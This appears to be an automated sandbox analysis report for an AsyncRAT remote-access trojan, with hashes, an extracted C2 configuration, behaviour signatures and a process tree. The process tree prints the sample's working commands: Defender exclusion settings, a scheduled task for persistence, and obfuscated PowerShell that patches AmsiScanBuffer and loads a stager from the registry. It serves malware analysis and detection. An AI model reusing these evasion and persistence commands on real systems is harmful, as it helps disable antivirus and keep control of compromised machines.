Analysis
-
max time kernel
78s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
01/11/2022, 10:42
Static task
static1
Behavioral task
behavioral1
Sample
BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Resource
win7-20220812-en
General
-
Target
BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
-
Size
584KB
-
MD5
8553f9793539d4d17c13e464d606d7dc
-
SHA1
a033d05b0c0a5b220fde15827b5c716fbec3b398
-
SHA256
bdd2412c4cb1952748237e6cc32bb3d39a68cb4e1ed3e00db88e74532f1c4d2a
-
SHA512
2d672c0a5dfaa1ebd9ee7dbdfec33c8c32bd3b827b03b206ad1bbcb414e2efa65fc8d284ba9c5037800f3c8d69a2a64a864562732951581244722a26401f3aec
-
SSDEEP
6144:LHns2eIXWxewKi/i/iHBW0LM7Sx2R1i0t03ugcHg4TU48YMizi:LH4x4KKABW0g2x6/t2S/UfYM4
Malware Config
Extracted
asyncrat
Ratatouille 0.1.0
Youtube
179.43.187.19:33
179.43.187.19:2525
179.43.187.19:4523
179.43.187.19:5555
sdhgamkfgae4-youtube
-
delay
3
-
install
true
-
install_file
$77-update.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/3084-139-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Looks for VirtualBox Guest Additions in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions $77-update.exe -
Executes dropped EXE 2 IoCs
pid Process 4836 $77-update.exe 456 $77-update.exe -
Looks for VMWare Tools registry key 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools $77-update.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion $77-update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion $77-update.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation $77-update.exe -
Maps connected drives based on registry 3 TTPs 4 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 $77-update.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum $77-update.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3172 set thread context of 3084 3172 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 88 PID 4836 set thread context of 456 4836 $77-update.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4120 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4900 timeout.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 4828 powershell.exe 1984 powershell.exe 1984 powershell.exe 4828 powershell.exe 2236 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Token: SeDebugPrivilege 456 $77-update.exe Token: SeDebugPrivilege 456 $77-update.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeDebugPrivilege 1984 powershell.exe Token: SeDebugPrivilege 2236 powershell.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 3172 wrote to memory of 3084 3172 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 88 PID 3172 wrote to memory of 3084 3172 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 88 PID 3172 wrote to memory of 3084 3172 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 88 PID 3172 wrote to memory of 3084 3172 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 88 PID 3172 wrote to memory of 3084 3172 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 88 PID 3172 wrote to memory of 3084 3172 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 88 PID 3172 wrote to memory of 3084 3172 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 88 PID 3172 wrote to memory of 3084 3172 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 88 PID 3084 wrote to memory of 3984 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 89 PID 3084 wrote to memory of 3984 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 89 PID 3084 wrote to memory of 3984 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 89 PID 3084 wrote to memory of 3564 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 91 PID 3084 wrote to memory of 3564 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 91 PID 3084 wrote to memory of 3564 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 91 PID 3984 wrote to memory of 4120 3984 cmd.exe 93 PID 3984 wrote to memory of 4120 3984 cmd.exe 93 PID 3984 wrote to memory of 4120 3984 cmd.exe 93 PID 3564 wrote to memory of 4900 3564 cmd.exe 94 PID 3564 wrote to memory of 4900 3564 cmd.exe 94 PID 3564 wrote to memory of 4900 3564 cmd.exe 94 PID 3564 wrote to memory of 4836 3564 cmd.exe 95 PID 3564 wrote to memory of 4836 3564 cmd.exe 95 PID 3564 wrote to memory of 4836 3564 cmd.exe 95 PID 4836 wrote to memory of 456 4836 $77-update.exe 96 PID 4836 wrote to memory of 456 4836 $77-update.exe 96 PID 4836 wrote to memory of 456 4836 $77-update.exe 96 PID 4836 wrote to memory of 456 4836 $77-update.exe 96 PID 4836 wrote to memory of 456 4836 $77-update.exe 96 PID 4836 wrote to memory of 456 4836 $77-update.exe 96 PID 4836 wrote to memory of 456 4836 $77-update.exe 96 PID 4836 wrote to memory of 456 4836 $77-update.exe 96 PID 456 wrote to memory of 1984 456 $77-update.exe 97 PID 456 wrote to memory of 1984 456 $77-update.exe 97 PID 456 wrote to memory of 1984 456 $77-update.exe 97 PID 456 wrote to memory of 4828 456 $77-update.exe 99 PID 456 wrote to memory of 4828 456 $77-update.exe 99 PID 456 wrote to memory of 4828 456 $77-update.exe 99 PID 456 wrote to memory of 4708 456 $77-update.exe 102 PID 456 wrote to memory of 4708 456 $77-update.exe 102 PID 456 wrote to memory of 4708 456 $77-update.exe 102 PID 4708 wrote to memory of 2236 4708 cmd.exe 103 PID 4708 wrote to memory of 2236 4708 cmd.exe 103 PID 4708 wrote to memory of 2236 4708 cmd.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"1⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"{path}"2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-update" /tr '"C:\Users\Admin\AppData\Roaming\$77-update.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-update" /tr '"C:\Users\Admin\AppData\Roaming\$77-update.exe"'4⤵
- Creates scheduled task(s)
PID:4120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF830.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:4900
-
-
C:\Users\Admin\AppData\Roaming\$77-update.exe"C:\Users\Admin\AppData\Roaming\$77-update.exe"4⤵
- Looks for VirtualBox Guest Additions in registry
- Executes dropped EXE
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Users\Admin\AppData\Roaming\$77-update.exe"{path}"5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension @('exe','dll') -Force6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mnrflr.exe"' & exit6⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mnrflr.exe"'7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\mnrflr.exe"C:\Users\Admin\AppData\Local\Temp\mnrflr.exe"8⤵PID:5060
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:tbkqimiyfzUz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IwYtXOtBtQwQqj,[Parameter(Position=1)][Type]$iPMuxlCOEI)$nGObfZbeYad=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$nGObfZbeYad.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$IwYtXOtBtQwQqj).SetImplementationFlags('Runtime,Managed');$nGObfZbeYad.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$iPMuxlCOEI,$IwYtXOtBtQwQqj).SetImplementationFlags('Runtime,Managed');Write-Output $nGObfZbeYad.CreateType();}$MoqKhxaskFoaV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$ERtSQpGpRGsnyV=$MoqKhxaskFoaV.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hdhBAHpWubGdiEZRnlF=tbkqimiyfzUz @([String])([IntPtr]);$AtWIqquCzxHiNYyxENXFfi=tbkqimiyfzUz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nVltDWITgSB=$MoqKhxaskFoaV.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$uYOfgWNwFTlDHf=$ERtSQpGpRGsnyV.Invoke($Null,@([Object]$nVltDWITgSB,[Object]('Load'+'LibraryA')));$MPiTVUgLZLAaebjPa=$ERtSQpGpRGsnyV.Invoke($Null,@([Object]$nVltDWITgSB,[Object]('Vir'+'tual'+'Pro'+'tect')));$bkPXySI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uYOfgWNwFTlDHf,$hdhBAHpWubGdiEZRnlF).Invoke('a'+'m'+'si.dll');$xNlZTUMACQZQgTSch=$ERtSQpGpRGsnyV.Invoke($Null,@([Object]$bkPXySI,[Object]('Ams'+'iSc'+'an'+'Buffer')));$TTdoOZlxkB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MPiTVUgLZLAaebjPa,$AtWIqquCzxHiNYyxENXFfi).Invoke($xNlZTUMACQZQgTSch,[uint32]8,4,[ref]$TTdoOZlxkB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$xNlZTUMACQZQgTSch,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MPiTVUgLZLAaebjPa,$AtWIqquCzxHiNYyxENXFfi).Invoke($xNlZTUMACQZQgTSch,[uint32]8,0x20,[ref]$TTdoOZlxkB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"1⤵PID:2136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ziNMgoNGoBRl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ddsvCpgnIuaPhx,[Parameter(Position=1)][Type]$owgjmaxBSx)$HBOboKbxVfh=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$HBOboKbxVfh.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$ddsvCpgnIuaPhx).SetImplementationFlags('Runtime,Managed');$HBOboKbxVfh.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$owgjmaxBSx,$ddsvCpgnIuaPhx).SetImplementationFlags('Runtime,Managed');Write-Output $HBOboKbxVfh.CreateType();}$BdGqLOqyvYNue=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$cSuiprfaphkETf=$BdGqLOqyvYNue.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GlWkWpIyEXtmHRCwDXp=ziNMgoNGoBRl @([String])([IntPtr]);$RWxZcAUYOwqiFpKSzzFWtH=ziNMgoNGoBRl @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hmeXdfWNtXe=$BdGqLOqyvYNue.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$hkMlyYqJUjEkpz=$cSuiprfaphkETf.Invoke($Null,@([Object]$hmeXdfWNtXe,[Object]('Load'+'LibraryA')));$hPHoMYKRUySYnRwkT=$cSuiprfaphkETf.Invoke($Null,@([Object]$hmeXdfWNtXe,[Object]('Vir'+'tual'+'Pro'+'tect')));$muIcHaz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hkMlyYqJUjEkpz,$GlWkWpIyEXtmHRCwDXp).Invoke('a'+'m'+'si.dll');$PPcbRbsDdDmZjgCcI=$cSuiprfaphkETf.Invoke($Null,@([Object]$muIcHaz,[Object]('Ams'+'iSc'+'an'+'Buffer')));$HRtOUGFNEa=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hPHoMYKRUySYnRwkT,$RWxZcAUYOwqiFpKSzzFWtH).Invoke($PPcbRbsDdDmZjgCcI,[uint32]8,4,[ref]$HRtOUGFNEa);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PPcbRbsDdDmZjgCcI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hPHoMYKRUySYnRwkT,$RWxZcAUYOwqiFpKSzzFWtH).Invoke($PPcbRbsDdDmZjgCcI,[uint32]8,0x20,[ref]$HRtOUGFNEa);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"1⤵PID:4008
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d596c8ed-b563-4340-950c-862a3a8ebd51}1⤵PID:5040
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53aea5c16a0e7b995983bd1771d5ea11d
SHA15ce845c82ace7946cec271a8bac45572b977419c
SHA2568d7143472e7cf3a40f46c6346251661e10fe3a932321cff14190648ee3d9c02f
SHA5124d0949cc3c0b7bc19b94a7166fb1a528c5833773b4b577f1730c4aab93ec03f3d72714ebf8a103f2a6ab4f97abef2945e78c91d464885fb4f1f9c584d7a1b243
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe.log
Filesize1KB
MD53aea5c16a0e7b995983bd1771d5ea11d
SHA15ce845c82ace7946cec271a8bac45572b977419c
SHA2568d7143472e7cf3a40f46c6346251661e10fe3a932321cff14190648ee3d9c02f
SHA5124d0949cc3c0b7bc19b94a7166fb1a528c5833773b4b577f1730c4aab93ec03f3d72714ebf8a103f2a6ab4f97abef2945e78c91d464885fb4f1f9c584d7a1b243
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD5714af411a9d3bfdfc0678dc327ba2efd
SHA1235b3c9ac6b3c5d5b67281614d3b4d13ada9a69b
SHA256a8e948b989b50f39428fee6c4472041238df559da32dc5df6dfacd3693bdeb97
SHA5125d455a8a7c18e837ea1e0d25e6a3d55427e1366e548cedf5662fc15c79246446186761002b710a75fe649b15bb4e0cbc61c3b9a1e7aff5fd3fee1b78521b2987
-
Filesize
15KB
MD5aa1f4cb989bfa8041d41c92787b7c954
SHA1888cc664aecdfaa56baf5543524c7dfd803e472a
SHA256f74e7f8f3c33ea4f66b7ddb069a559b6a04cffaf0ef76ab8230f44b3d5d9fe61
SHA5126c4bdfcac64d4dad964c0d098407f1bea7bba8a099229c70bf0914c2c2651f3d56a34e1e4f30b58efc50e90a424fa55fd64251bd7de6af5002292367cd860494
-
Filesize
351KB
MD5e2462dff81e09c335dd89f711c7a2fba
SHA15b9badc4d85f1ce4912772507523ab062a730d4e
SHA256fcd60b5bd3815f1c591ada33b9a46d4126c216dc32cc7b946352a938844138bd
SHA512bbedc7d5c74ecd851e422aa5c89768300b4522d08ef8f361c4eb84f6830d146bc0069c070f7fdf686f01eceed4786240a55770f8fcbcdf60902bc6c60cb4243e
-
Filesize
351KB
MD5e2462dff81e09c335dd89f711c7a2fba
SHA15b9badc4d85f1ce4912772507523ab062a730d4e
SHA256fcd60b5bd3815f1c591ada33b9a46d4126c216dc32cc7b946352a938844138bd
SHA512bbedc7d5c74ecd851e422aa5c89768300b4522d08ef8f361c4eb84f6830d146bc0069c070f7fdf686f01eceed4786240a55770f8fcbcdf60902bc6c60cb4243e
-
Filesize
154B
MD52b36af4e30b65e5e8516477e5d3cf7b2
SHA1489ae3a90e68a304e3e8725e433c89a2ed979832
SHA25611cd2619376b14271470c08a04bfdf29d832716c7da38d8d80d45eeba8ae6a6e
SHA512172f0802b3bc652d1e278bb1ae22e7652cb4c95529c327cf041fc65420e6cebd955da2e7c93d5a3b1bb3d1f4dc038c8097e9bf1f0adda55040f05d878579fae1
-
Filesize
584KB
MD58553f9793539d4d17c13e464d606d7dc
SHA1a033d05b0c0a5b220fde15827b5c716fbec3b398
SHA256bdd2412c4cb1952748237e6cc32bb3d39a68cb4e1ed3e00db88e74532f1c4d2a
SHA5122d672c0a5dfaa1ebd9ee7dbdfec33c8c32bd3b827b03b206ad1bbcb414e2efa65fc8d284ba9c5037800f3c8d69a2a64a864562732951581244722a26401f3aec
-
Filesize
584KB
MD58553f9793539d4d17c13e464d606d7dc
SHA1a033d05b0c0a5b220fde15827b5c716fbec3b398
SHA256bdd2412c4cb1952748237e6cc32bb3d39a68cb4e1ed3e00db88e74532f1c4d2a
SHA5122d672c0a5dfaa1ebd9ee7dbdfec33c8c32bd3b827b03b206ad1bbcb414e2efa65fc8d284ba9c5037800f3c8d69a2a64a864562732951581244722a26401f3aec
-
Filesize
584KB
MD58553f9793539d4d17c13e464d606d7dc
SHA1a033d05b0c0a5b220fde15827b5c716fbec3b398
SHA256bdd2412c4cb1952748237e6cc32bb3d39a68cb4e1ed3e00db88e74532f1c4d2a
SHA5122d672c0a5dfaa1ebd9ee7dbdfec33c8c32bd3b827b03b206ad1bbcb414e2efa65fc8d284ba9c5037800f3c8d69a2a64a864562732951581244722a26401f3aec